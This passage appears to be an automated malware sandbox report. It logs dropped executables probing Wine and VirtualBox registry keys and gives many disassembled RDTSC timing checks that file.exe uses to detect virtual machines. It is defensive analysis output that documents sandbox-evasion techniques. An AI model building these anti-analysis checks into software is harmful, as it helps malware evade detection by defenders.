                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE69B second address: EFE69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFE69F second address: EFE6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1BBDE second address: F1BBF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4000E20B66h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop ebx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FD33 second address: F1FD4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400072A736h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FDDB second address: F1FDE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FDE1 second address: F1FDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FDE5 second address: F1FE64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a jne 00007F4000E20B6Ch 0x00000010 pop edi 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F4000E20B68h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov edx, dword ptr [ebp+122D26FEh] 0x00000032 movzx edi, di 0x00000035 jc 00007F4000E20B6Ch 0x0000003b sub dword ptr [ebp+122D1B8Fh], ebx 0x00000041 push 00000000h 0x00000043 mov dword ptr [ebp+122D1C76h], eax 0x00000049 mov dword ptr [ebp+122D1AABh], edx 0x0000004f push 1F7D6ACDh 0x00000054 pushad 0x00000055 jmp 00007F4000E20B78h 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FE64 second address: F1FEDD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 1F7D6A4Dh 0x0000000e jmp 00007F400072A72Ah 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F400072A728h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov esi, dword ptr [ebp+122D2B07h] 0x00000035 push 00000000h 0x00000037 movsx ecx, ax 0x0000003a push 00000003h 0x0000003c call 00007F400072A731h 0x00000041 sub dword ptr [ebp+122D1AB5h], edx 0x00000047 pop edi 0x00000048 adc esi, 3FCDEBC7h 0x0000004e push 87ACD517h 0x00000053 pushad 0x00000054 jmp 00007F400072A72Ch 0x00000059 push ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FF84 second address: F1FF88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FF88 second address: F1FF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FF8E second address: F1FF98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4000E20B66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FF98 second address: F1FFAA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F400072A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FFAA second address: F20035 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4000E20B6Fh 0x0000000c jmp 00007F4000E20B6Fh 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 jmp 00007F4000E20B77h 0x00000019 push 00000000h 0x0000001b push 997E857Ah 0x00000020 jmp 00007F4000E20B6Ah 0x00000025 add dword ptr [esp], 66817B06h 0x0000002c mov esi, dword ptr [ebp+122D29B7h] 0x00000032 push 00000003h 0x00000034 mov di, BACEh 0x00000038 push 00000000h 0x0000003a and si, 8EA6h 0x0000003f mov ecx, dword ptr [ebp+122D1E46h] 0x00000045 push 00000003h 0x00000047 add esi, dword ptr [ebp+122D1AABh] 0x0000004d call 00007F4000E20B69h 0x00000052 push esi 0x00000053 pushad 0x00000054 jc 00007F4000E20B66h 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F20035 second address: F20050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F400072A728h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edi 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F20050 second address: F200EC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F4000E20B78h 0x00000011 ja 00007F4000E20B66h 0x00000017 popad 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d jg 00007F4000E20B72h 0x00000023 pop eax 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007F4000E20B68h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e lea ebx, dword ptr [ebp+12453B7Dh] 0x00000044 jp 00007F4000E20B6Ch 0x0000004a push eax 0x0000004b jmp 00007F4000E20B71h 0x00000050 pop ecx 0x00000051 xchg eax, ebx 0x00000052 push ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F4000E20B6Fh 0x0000005a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E6A0 second address: F3E6A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E6A4 second address: F3E6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4000E20B66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007F4000E20B66h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E811 second address: F3E83E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400072A736h 0x00000009 jmp 00007F400072A733h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3EEE5 second address: F3EEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3EEEB second address: F3EEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3EEF0 second address: F3EF00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4000E20B6Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3EF00 second address: F3EF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F07D second address: F3F086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F086 second address: F3F08C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F08C second address: F3F096 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4000E20B66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F337 second address: F3F33E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F640 second address: F3F645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F645 second address: F3F657 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F400072A72Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F657 second address: F3F65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F65B second address: F3F65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BABD second address: F0BAC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4000E20B66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F95F second address: F3F97D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F400072A739h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F97D second address: F3F983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3FFAE second address: F3FFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3FFBA second address: F3FFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F4000E20B6Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F400F7 second address: F400FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40683 second address: F4068F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4068F second address: F406A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400072A72Ch 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F406A0 second address: F406A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F406A6 second address: F406AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F43423 second address: F43433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F43433 second address: F43444 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F400072A726h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F43444 second address: F43450 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F464F9 second address: F46503 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F400072A72Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4ACBF second address: F4ACF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F4000E20B91h 0x0000000f push eax 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4000E20B73h 0x0000001c js 00007F4000E20B66h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A118 second address: F4A11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A265 second address: F4A272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A272 second address: F4A278 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A278 second address: F4A282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4000E20B66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A282 second address: F4A2B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400072A733h 0x00000007 jmp 00007F400072A72Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F400072A726h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A58F second address: F4A59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007F4000E20B66h 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A59D second address: F4A5D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F400072A737h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jng 00007F400072A734h 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4AB2F second address: F4AB4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B76h 0x00000007 jnl 00007F4000E20B6Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C710 second address: F4C73F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F400072A73Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F400072A72Ch 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C7D7 second address: F4C7FA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b add dword ptr [esp], 7CBDFA4Dh 0x00000012 sub dword ptr [ebp+122D301Ah], esi 0x00000018 push 1B7C1217h 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pushad 0x00000021 popad 0x00000022 pop edi 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C946 second address: F4C94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C94A second address: F4C957 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CF1B second address: F4CF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CF22 second address: F4CF27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D43F second address: F4D47F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F400072A728h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push eax 0x00000028 pushad 0x00000029 jng 00007F400072A728h 0x0000002f push edi 0x00000030 pop edi 0x00000031 push eax 0x00000032 push edx 0x00000033 jnc 00007F400072A726h 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D56B second address: F4D574 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D9BE second address: F4D9C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50255 second address: F50298 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jne 00007F4000E20B74h 0x00000012 nop 0x00000013 xor dword ptr [ebp+122D268Ch], ebx 0x00000019 push 00000000h 0x0000001b and esi, 13D6A902h 0x00000021 push 00000000h 0x00000023 mov esi, dword ptr [ebp+122D2BCFh] 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d jno 00007F4000E20B66h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50298 second address: F5029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F52323 second address: F5232D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4000E20B66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F52F7F second address: F52F89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F52C3B second address: F52C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F52C41 second address: F52C5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F400072A726h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F400072A728h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F53A04 second address: F53A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54559 second address: F5455D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5455D second address: F545F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F4000E20B68h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jp 00007F4000E20B6Ch 0x0000002d push 00000000h 0x0000002f ja 00007F4000E20B66h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F4000E20B68h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 jmp 00007F4000E20B71h 0x00000056 xchg eax, ebx 0x00000057 push ebx 0x00000058 jmp 00007F4000E20B70h 0x0000005d pop ebx 0x0000005e push eax 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 js 00007F4000E20B66h 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F57E9D second address: F57EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jl 00007F400072A726h 0x0000000d pop edi 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F57EB0 second address: F57EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4000E20B66h 0x0000000a jmp 00007F4000E20B6Eh 0x0000000f jmp 00007F4000E20B6Fh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
